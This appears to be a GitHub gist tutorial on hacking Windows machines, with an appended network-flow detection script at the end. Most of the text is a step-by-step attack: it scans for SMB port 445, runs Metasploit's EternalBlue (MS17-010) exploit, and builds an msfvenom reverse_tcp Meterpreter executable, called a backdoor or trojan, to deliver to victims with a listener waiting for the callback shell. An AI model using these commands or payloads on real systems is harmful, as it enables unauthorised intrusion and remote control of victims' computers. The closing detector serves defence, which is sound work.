@fadhilsaheer
Last active August 25, 2021 04:08
Let's hack into Windows 👨‍💻

H4CK WINDOWS 🕵️‍♂️

H4ck Windows using METASPLOIT 🐱‍💻

DO NOT HACK ANYONE UNTIL YOU HAVE PERMISSION ❗


I assume you have a decent Linux distro for hacking.

I recommend Parrot OS or Kali,

or at least having Metasploit installed 🐱‍💻


  • The target's firewall must be turned off
  • Attacker and victim must be on the same network [ at least the attacker must know the victim's IP address ]

EternalBlue

EternalBlue (MS17-010) is a critical vulnerability in SMB on Windows 7 and earlier, reached over SMB port 445.


Scan the target and check whether its SMB port (445) is open or not:

import socket

target_ip = "target ip"  # specify your target's IP
target_port = 445

# A plain TCP connect check: if the three-way handshake completes, the port is open.
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(3)  # do not hang forever on a filtered port
try:
    sock.connect((target_ip, target_port))
    print("[+] PORT 445 IS OPEN, YOU CAN ATTACK !!")
except OSError:  # covers timeout, connection refused and host unreachable
    print("[-] TARGET IS SAFE, TRY ANOTHER WAY TO ATTACK :(")
finally:
    sock.close()

If the target's port is open we can hack 👨‍💻

Open Metasploit:

sudo msfconsole

After Metasploit has started, select the EternalBlue module:

msf6 > use exploit/windows/smb/ms17_010_eternalblue

This is a prebuilt Metasploit module; you can see its options by typing show options:

msf6 exploit(windows/smb/ms17_010_eternalblue) > show options

We will be shown a lot of options, but we are interested only in LHOST, LPORT and RHOSTS.

Metasploit is kind enough to auto-configure LPORT and LHOST;

you can change them whenever you need:

set RHOSTS <TARGET_IP>
set LHOST <YOUR_IP>
set LPORT <ANY_PORT>

Simply run the exploit by typing run or exploit:

msf6 exploit(windows/smb/ms17_010_eternalblue) > run

If you did it the right way 🛣 you should get a Meterpreter shell back.


CONGRATULATIONS, YOU JUST H4CKED INTO A SYSTEM 🎊🥳👨‍💻


Payloads 🦟

A payload is a piece of malicious code that, once delivered to and executed on a device, gives the attacker control over it.


We're going to make one 👨‍💻

Some of the payload-generating tools 🔨

We are using msfvenom because it comes preinstalled with the Metasploit Framework; feel free to use other tools, you can just read their manuals 😄


In the case of a payload-based attack, we can't hack into a system without having any contact with it: we need a way to deliver the payload to the victim. The joyful thing is that it works fine on any Windows machine 😉

Let's rock and roll


Generate the payload:

msfvenom -p [payload_type] -a [victim_architecture] LHOST=[YOUR_IP] LPORT=[ANY_OF_YOUR_PORT] -o payload.exe

You need to replace the [..] parts.

...

There are many payload types in Msfvenom 🐍

I usually recommend and use

  • windows/x64/meterpreter/reverse_tcp for 64 bit devices
  • windows/meterpreter/reverse_tcp for 32 bit devices

You need to specify the victim's architecture after -a:

  • x64 for 64 bit devices
  • x86 for 32 bit devices

...

We have successfully created a payload [ also known as a backdoor, virus, trojan, etc. ]


We need to start a listener 👂 in Metasploit.

Fire up Metasploit:

sudo msfconsole

Select the generic handler module:

use exploit/multi/handler

Set the options to match the values used in the payload:

set LHOST <IP-SET-IN-PAYLOAD>
set LPORT <PORT-SET-IN-PAYLOAD>

Enter run.

This will start the listener.


Wait for the victim to execute the payload; you should get a Meterpreter shell back.


Congratulations, You Have Hacked Into Another System 👨‍💻
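Both procedures above leave the same footprint on the victim's network: an inbound connection to SMB port 445 (the EternalBlue step) followed shortly by a new outbound connection from the victim back to the attacker on LPORT (the reverse_tcp Meterpreter callback). The following is an added detection example, not part of the original gist; it assumes a constructed flow-log format of "<ISO time> <src>:<port> -> <dst>:<port> <inbound|outbound>" and the sample lines are made up for illustration.

```python
import re
from datetime import datetime, timedelta

# Constructed sample flow-log lines (not real captures).
SAMPLE_FLOWS = """\
2021-08-25T04:01:10 10.0.0.5:51000 -> 10.0.0.20:445 inbound
2021-08-25T04:01:12 10.0.0.20:49712 -> 10.0.0.5:4444 outbound
2021-08-25T04:02:00 10.0.0.7:52011 -> 10.0.0.20:445 inbound
2021-08-25T04:05:00 10.0.0.20:49800 -> 10.0.0.9:443 outbound
"""

FLOW_RE = re.compile(r"^(\S+) (\S+):(\d+) -> (\S+):(\d+) (inbound|outbound)$")


def parse_flows(text):
    """Parse flow lines into dicts; lines that do not match the format are skipped."""
    flows = []
    for line in text.splitlines():
        m = FLOW_RE.match(line.strip())
        if not m:
            continue
        ts, src, sport, dst, dport, direction = m.groups()
        flows.append({"ts": datetime.fromisoformat(ts), "src": src, "sport": int(sport),
                      "dst": dst, "dport": int(dport), "dir": direction})
    return flows


def find_smb_callbacks(flows, window_seconds=120):
    """Flag every host that accepts an SMB (445) connection from a peer and then, within
    the window, opens a new outbound connection back to that same peer on any port.
    That is the shape of an SMB exploit followed by a reverse-TCP shell callback.
    Returns (victim, peer, callback_port) tuples."""
    flows = sorted(flows, key=lambda f: f["ts"])
    window = timedelta(seconds=window_seconds)
    findings = []
    for i, smb in enumerate(flows):
        if smb["dport"] != 445 or smb["dir"] != "inbound":
            continue
        for later in flows[i + 1:]:
            if later["ts"] - smb["ts"] > window:
                break  # flows are time-sorted, nothing later can be in the window
            if (later["dir"] == "outbound" and later["src"] == smb["dst"]
                    and later["dst"] == smb["src"]):
                findings.append((smb["dst"], smb["src"], later["dport"]))
    return findings


if __name__ == "__main__":
    for victim, peer, port in find_smb_callbacks(parse_flows(SAMPLE_FLOWS)):
        print(f"[!] {victim} took SMB from {peer} then called back to {peer}:{port}")
```

A patched host, or one with SMBv1 disabled and 445 filtered at the firewall, never produces the first half of this pattern, which is the mitigation the prerequisites list above implies.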

